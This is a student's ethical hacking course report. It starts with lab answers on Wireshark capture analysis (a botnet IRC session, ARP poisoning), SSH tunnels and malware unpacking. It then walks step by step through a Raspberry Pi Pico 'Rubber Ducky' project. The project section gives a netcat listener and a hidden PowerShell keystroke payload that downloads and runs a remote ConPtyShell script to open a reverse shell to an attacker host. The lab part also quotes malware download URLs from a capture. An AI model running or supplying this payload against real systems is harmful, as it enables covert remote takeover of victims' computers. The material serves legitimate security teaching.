- Use **IMDSv2** instead of **v1**, which requires a session-oriented request to access metadata, adding a layer of protection against **SSRF attacks**
- **Restrict Outbound Traffic:** Implement strict firewall rules and security groups to control outbound traffic from your servers, preventing unauthorized access to internal resources, including the IMDS endpoint.
- **Proper input validation and sanitization**: Now everything that was being inputed in the web server was accepted (in the SANS lab).
## **5.4 Wireshark – Attack and Reconnaissance Signatures**
### **A) Using the osfingerprinting.pcap file make a Wireshark filter that displays all unique illegal ping packets.**
- After investigating the osfingerprinting.pcap file in WireShark, I used the **icmp.type == 8** & **icmp.code != 0** command to filter and display all unique and illegal ping packets.
### **B) Using active-scan.pcap and the illegal ping packet filter from task a. Try to find an ICMP echo request (type 8) packet with the wrong code value.**
- Used the same filter **icmp.typ == 8** and got a **code: 19** which is **LANguard**.
![5.4-B](https://hackmd.io/_uploads/rktu_Wq36.png)
### **C) Using active-scan.pcap note the number of TCP resets, how many?**
- **Filter command:** ```tcp.flags.reset == 1```
**Displayed:** 229
![5.4-C](https://hackmd.io/_uploads/BJt1F-cn6.png)
### **D) Using active-scan.pcap, did the scanner look for any open UDP ports, if so which ones?**
- **Filter command:** ```icmp.type == 3``` and we found **Port 161**
![5.4-D](https://hackmd.io/_uploads/B1NbnQchT.png)
### **E) Using sick-client.pcap try to identify the bot information (user/nick, IP:port) the bot (bbjj.househot) use when connecting to its botnet**
- **Filter command:** ```"tcp.stream eq 1"```
We follow the TCP stream to identify the bot information.
**USeR:** l l l l
**NiCK:** p8-00196671
**IP:** 10.129.211.13
**Dst port:** 18067
**Src port:** 1048
![5.4-E](https://hackmd.io/_uploads/SJmEaX9nT.png)
- A DNS query packet is seen being sent from the source IP address of 10.129.211.13 to the destination IP address of 10.129.56.6 with the aim of obtaining the A record for the domain bbjj.househot.com. Later, a DNS response packet is observed in which it is disclosed that ypgw.wallloan.com is the destination of a CNAME record for the domain bbjj.househot.com. The latter domain has connections to several IP addresses, a few of which are listed below. Additionally, the packet includes details on the NS records for ns.xinnet.cn and ns.xinnetdns.com.
![asdasdasdasdasdasdasdasd](https://hackmd.io/_uploads/rJyKAVqna.png)
### **F) This is a capture from a compromised system which boots up, runs for just about 3 minutes,then CPU utilization hits 100% and the system locks up. Using clientdying.pcap describe what is happening?**
- We start by looking at **TFTP** first and see that it reads a file called **analiz.exe** with another bunch of data.
![5.4-F1](https://hackmd.io/_uploads/SyktI4qhT.png)
- **SMB:** We can also see that a **DCRERPC** bind request being made from the IP **69.144.115.50** with destination **172.16.1.10**. This tells ous that it seems like the attacker is setting up a connection through **SMB**.
![5.4-F2](https://hackmd.io/_uploads/HJ0yuNq2a.png)
- **IRC:** **Filter command** ```tcp.stream eq 13``` and we follow the TCP stream: Output shows ous that the compromised system connects to the IRC server "hunt3d.devilz.net" with the NiCK "damn-0262937047".
The server recognizes the hostname after responding with authentication messages, which indicates a seccessful connection.
We can also see that the IRC server sends commands to download files from specified URLs. "http://www.wanees.net/bbnz.exe," "http://webacceptor.findwhatevernow.com:8091/get.file?action=file&afp=13001&class=682&affiliate=jocker," and "http://ysbweb.com/ist/scripts/ysb_exe.php?account_id=1000489&user_level=3.".
The victim also receives commands to execute the downloaded files such as "joker.exe", "bbnz.exe" and "ysbinstall_1000489_3.exe."
In the last packets you can see that the connection fails with the SYN packets. This indicates that the compromised system is not responding.
![Untitled](https://hackmd.io/_uploads/H1IG2N536.png)
- **RPC:** We can also see the attacker is initiating a connection to the windows
RPC service on the victim machine.
![Untitwwwwwwwwwwwwwled](https://hackmd.io/_uploads/HyRKnNcnT.png)
### **G) The arp-poison.pcap is a capture from a man-in-the-middle attack. What IP and MAC address is the attacker having and who are the victims, explain for me please!?**
- **Attackers IP:** 192.186.1.102 with the **Mac address:** AmbitMicrosy_aa:af:80 (00:d0:59:aa:af:80)
and the **Victims:** 192.168.1.1 & 192.168.1.103
![5.4-G](https://hackmd.io/_uploads/HJnfvk92T.png)
- You can that see the attack take place at start at row **6 & 7**.
The attacker sends **ARP messages** to both victims, falsely representing their IP addresses, causing the victims to route their traffic to the attacker instead of the correct destination. The attacker spoofs the IP address 192.168.1.103 in packet 7 by sending an ARP message to 192.168.1.1. The attacker then impersonates 192.168.1.1 and sends an ARP message to 192.168.1.103 in a subsequent packet. Any traffic exchanged between the victims is redirected to the attacker when the victims' ARP tables are altered. 192.168.1.1, for example, sends an HTTP GET request to 192.168.1.103 in packet 15, but the attacker intercepts the request and modifies it by adding a "Host" header before sending it to 192.168.1.103. The attacker intercepts the next HTTP response meant for 192.168.1.1 and modifies it as they see fit.
## **5.5.1 Forward SSH tunnel**
### **Report: What was your commands and result (screenshot)?**
- **Command:** ```ssh -L 6661:sqube-student.du.se:9000 h21samva@maggie.du.se``` and then I entered the website "localhost:6661" and reached SonarQube and got access.
![5.5.1](https://hackmd.io/_uploads/BJtx3Zch6.png)
## **5.5.2 Socks proxy SSH tunnel**
### **Report: What was your commands and result (screenshot)?**
- **Commands:** ```ssh -D 1234 -C h21samva@130.243.52.242``` and after I logged in, I opened a new terminal in the Chrome dir and enter ```chrome --proxy-server="socks5://localhost:5080"``` and in the chrome application I entered the address **sqube-student.du.se:9000** and got access.
![5.2.2](https://hackmd.io/_uploads/Bklpbzc3p.png)
## **5.5.3 Reverse SSH tunnel**
### **Report: What was your commands and result (screenshot) in task A and B?**
### **A)**
- So I started off by entering the **Command:** ```sudo ssh -R 2222:localhost:22 -i /home/h21samva/Downloads/key.key ubuntu@129.151.212.132``` and logged in from my kali machine.
Then I logged in to my Oracle VM from Windows CMD and ssh'd to my kali machine from the Oracle VM.
```"ssh -p 2222 h21samva@localhost"``` thus doing a Reverse SSH tunnel.
![5.5.3](https://hackmd.io/_uploads/rypwofc2p.png)
### **B)**
- So here I logged on to my Oracle VM (left terminal) and afterward logged in from the localhost (right terminal). I was a bit confused of that is the task or not. But I think I figured it out.
![5.5.3-B](https://hackmd.io/_uploads/ByPUWrq2a.png)
## **5.5.4 Double pivot SSH tunnel**
### **Report: What was your commands and result (screenshot)?**
- **Command:** ```ssh -p 22 ubuntu@129.151.212.132 -L 2222:maggie.du.se:22``` to create a forward double pivot SSH tunnel (left terminal).
Then we connect to maggie with **Command:** ```ssh -p 2222 h21samva@localhost``` (right terminal) and got access to maggie.
![5.5.4](https://hackmd.io/_uploads/ByYfMHc3T.png)
## **5.6 Reverse engineer managed code**
### **Report: Describe the decoding/encoding algorithm in short and the found evidence for your statement.**
- The **encoding/decoding algorithm** is **base64**. I verified it by using **ILSpy**.
![5.6](https://hackmd.io/_uploads/ByzbCyc2T.png)
**Base64** represents binary data in an ASCII string format, and is often
used for encoding/decoding data when transmitting it over a network, storing it in databases, etc..
The algorithm we are going to figure out is used for and in:
• To store passwords securely.
• Evade anti-spam systems and IDS/IPS.
• Obfuscate both binary and scripting malware.
• URL, Crypto and mail applications
## **5.7 Analysis of an unknown binary file**
### **Report: What are the true capabilities and functions of the file? Document all the steps and commands you used and the motive for performing those in your answer. Attach relevant output and findings in your answer. You should be able to find the origins of the malware on the internet.**
- We start of with a static analysis by executing the **Commands:** ```"binwalk esh``` & ```readelf -a esh"``` and get information about the .exe file:
![5.7](https://hackmd.io/_uploads/HJ9Snfon6.png)
- Afterwards we execute the **Commands:** ```upx -d esh -o esh_unpacked``` to unpack the .exe file and then convert it to a .txt by stringing it with the **Command:** ```"strings esh_unpacked > unpacked_esh.txt"```
![5.7-B](https://hackmd.io/_uploads/S11ICzj2a.png)
Investigating the .txt file we find a backdoor from "SIMPP", and after googling it we find the website "https://packetstormsecurity.com/files/69560/evilshell.c.html"
## **5.8 Lab Feedback**
### **A) Was this a relevant and appropriate lab and what about length etc?**
- This was indeed a relevant and a good lab. We did it in a group of students together which made it way more fun. I really enjoyed the **SANS labs**, learned a lot. High quality labs and really fun.
- I enjoyed this cloud lab very much.
### **B) What corrections and/or improvements do you suggest for this lab?**
- The ssh tunnel task gave some of the other students some problems. I managed to solve it smoothly. They had some ssh troubles and we later on fixed.
- Perhaps the length of the lab was a bit long but manageable non the less.
---
# **Project report**
## **Reverse Shell using the Raspberry Pi Pico as a Rubber Ducky to inject a payload**
**Date:** 12-03-2024
**Author:** Sam Valashjardi - h21samva@du.se
**Course:** GDT2Y3 - Ethical Hacking
![usb-rubber-ducky_mk2_800x](https://hackmd.io/_uploads/r1kIeP2aa.png)
---
### **Overview:**
**After** a lot of research and many changes to my initial project idea, I have finally chosen to dive into the exciting journey of programming my Raspberry Pi Pico W to be a "bad USB/Rubber Ducky" device, having the capability to inject a malicious payload onto a target system.
This project, also known as **Pico-Ducky**, was taken with inspiration from [dbisu's GitHub page](https://github.com/dbisu/pico-ducky), as well as the innovative payloads provided by [Hak5's GitHub page](https://github.com/hak5) as well, with all the awesome payloads that it offers.
[Hak5](https://shop.hak5.org/) an industry-leading hacker tools & award winning hacking shows for red teams, pentesters, cyber security students and IT professionals. I highly recommend you to visit their site and check out all the fun stuff they have.
In this report, I will outline a detailed, step-by-step guide into assembling and completing the project. I have made sure to explain each stage in great detail so that you will gain a rounded understanding of the process.
**Happy reading.**
*A side note*, I wanted to encrypt the reverse shell connection at first with the tool [**Socat**](http://www.dest-unreach.org/socat/), but could not manage to get Socat to work on my PC. I came to the conclusion that there have to be some issues with the different versions. But I used NetCat instead for this project, which works just as fine.
* *The socat utility is a relay for bidirectional data transfers between two independent data channels. This tool is regarded as the advanced version of netcat. They do similar things, but socat has more additional functionality, such as permitting multiple clients to listen on a port, or reusing connections.*
---
### **Objective:**
**So why this project?**
I think not only is this project an undeniably awe-inspiring one, it's also vitally important. Now, more than ever, the importance of applying ethical hacking principles resides in a world full of cyber threats and data breaches.
Just the thought of being able to have full hidden access to a computer within seconds is rather baffling, and hopefully, the project will show how important awareness of your surroundings really is.
---
### **Project setup:**
I will include all the **hardware, tools, configurations, operating system, payloads & scripts** that made the project possible, and walk through it in a step-by-step manner.
**Hardware:**
- **Raspberry Pi Pico W:** *"Raspberry Pi Pico is a low-cost, high-performance microcontroller board with flexible digital interfaces"* - [raspberrypi.com](https://www.raspberrypi.com/products/raspberry-pi-pico/).
**Tools:**
- **NetCat:** *"Netcat or NC is a utility tool that uses TCP and UDP connections to read and write in a network. It can be used for both attacking and security. In the case of attacking. It helps us to debug the network along with investigating it. It runs on all operating systems."* - [geeksforgeeks.org](https://www.geeksforgeeks.org/introduction-to-netcat/).
**Operating system:**
- **Kali Linux:** *"is an open-source, Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. It does this by providing common tools, configurations, and automations which allows the user to focus on the task that needs to be completed, not the surrounding activity.
Kali Linux contains industry specific modifications as well as several hundred tools targeted towards various Information Security tasks, such as Penetration Testing, Security Research, Computer Forensics, Reverse Engineering, Vulnerability Management and Red Team Testing.
Kali Linux is a multi-platform solution, accessible and freely available to information security professionals and hobbyists."* - [kali.org](https://www.kali.org/docs/introduction/what-is-kali-linux/).
- **Windows 10:** Windows 10 is a Microsoft operating system for personal computers, tablets, embedded devices and internet of things devices.
**Configurations:**
- **CircuitPython:** *"is a programming language designed to simplify experimenting and learning to code on low-cost microcontroller boards."* - [circuitpython.org](https://circuitpython.org/).
- **Adafruit circuitpython bundle:** This is the **Adafruit bundle** we use in order to import and make the Pico into a **HID** (more on that later). [GitHub page for Adafruit CircuitPython bundle](https://github.com/adafruit/Adafruit_CircuitPython_Bundle/releases/tag/20240307).
- **Circuitpython keyboard layouts:** We have to change to a swedish keyboard layout for the **Pico-Ducky** to work and execute the script. [GitHub page for CircuitPython keyboard layout](https://github.com/Neradoc/Circuitpython_Keyboard_Layouts/blob/main/PICODUCKY.md).
**Payload & script:**
- **Payload Library for the USB Rubber Ducky by Hak5:** There are lots of different kinds of payloads here. Everything from **recon, mobile, remote access, pranks, exfiltration** and so on.
Visit the [Hak5 GitHub page](https://github.com/hak5/usbrubberducky-payloads/tree/master/payloads/library) to view all the community developed payloads and libraries.
![payload](https://hackmd.io/_uploads/BkaFLhnaa.png)
> Some examples of payloads.
### **Set up the Pico-Ducky and Kali Linux:**
**First off:** we start with setting up our **Kali Linux.**
We are going to need the IP address of our Kali machine together with a port of our choosing, in this case, it's going to be: **4444.** (What we do with the IP comes later on).
Then we open up the terminal and enter the **command:** ```stty raw -echo; (stty size; cat) | nc -lvnp 4444```
We can now manipulate the terminal settings and use network sockets for listening and transferring data on the victim PC.
![kaliNC](https://hackmd.io/_uploads/Hye9ohh6a.png)
**Time to set up the Pico-Ducky:**
- We start by connecting the Pico to our PC and drag in the **.uf2** file from the **CircuitPython** files that we downloaded to the root of the Pico. The will reboot and then connect as ```CIRCUITPY```.
![kaliNC](https://hackmd.io/_uploads/B1PDxTn6T.png)
- Then we create a folder in the Pico and name it **lib**. This is where we insert and implement the Adafruit libraries. The most important folder here is **adafruit_hid**.
![lib](https://hackmd.io/_uploads/Hk7Fl62pT.png)
- We have just turned our Pico into a **Human interface device - HID** device. This means that we are tricking the computer into thinking that we are either a keyboard, or a mouse for example, and inherently by default the computer will trust a human. That is one of the reasons why this is really dangerous. Another reason why this is so effective is that the Pico-Ducky can write ~1000 words a minute, while a human averages around 60.
![hid](https://hackmd.io/_uploads/HyZ7fThaT.png)
*As we see, the device is under Human Interface Devices.*
- Next step is to load the rest of the files from the Adafruit circuitpython bundle to the root folder of the Pico, which are: ```duckyinpython.py, code.py, webapp.py, wsgiserver.py```.
- We include the keyboard layout in the **lib** folder and change the layout name to the country of your choise. Then we open up the ```duckyinpython.py```file and specify what language we are using. **sw for Swedish in the case.**
![keyb](https://hackmd.io/_uploads/SyggiEiapp.png)
- Now the final stage, the **script** and **payload**.
I tried a bunch of different payloads and script, everything from prank payloads to recon and remote access. I decided to create my own payload and execute string for it. But the PowerShell script is taken from [antonioCoco](https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1), it is quite the script.
The string that is executed is: **```STRING powershell -w hidden IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 192.168.XX.XX 4444```**.
Here is by the way, where you insert the IP of your kali machine and port that we talked about earlier in the report.
![payloadDD](https://hackmd.io/_uploads/HyVkJj6ap.png)
*Here is a screenshot of the payload, I have added a 0.6 second delay on each step so that we can see for demonstration purposes what is going on. These delays can be significantly reduced, to the point where you can't see whats happening on the screen.*
That is the entire set up for the **Pico-Ducky**.
### **Finalizing the project and demonstrating it**
I have recorded a video of the demonstration.
**[You will find it here.](https://www.youtube.com/watch?v=f8vYq_Sl33Y&feature=youtu.be)**
### **Summary, Thoughts & Student questions**
I really enjoyed working on this project; it is something that I have wanted to do for a while. The labs we had prior to this project really helped pave the way in understanding each step a lot.
This was, without a doubt, the best course in the whole education. There were some hardships at first when I wanted to use **SoCat** in order to encrypt the reverse shell, but after many hours, I changed to **Netcat** instead. Perhaps for a future project, I'll make it work and also compare the connections in **Wireshark** and analyze the traffic.
**What I have learned?**
- Getting up from your lapton for just one second? **win + L** !!
(*even tho there are payloads and scripts that can bypass that as well.*)
But I'm happy and satisfied with what I have achieved in this project.
**Student questions:**
- **A)** Is it possible in this case to use the Pico-Ducky on another operating system then Windows?
- **B)** Can you use multiple payloads and scripts on one Pico-Ducky?
**All my sources are presented as links through out the report*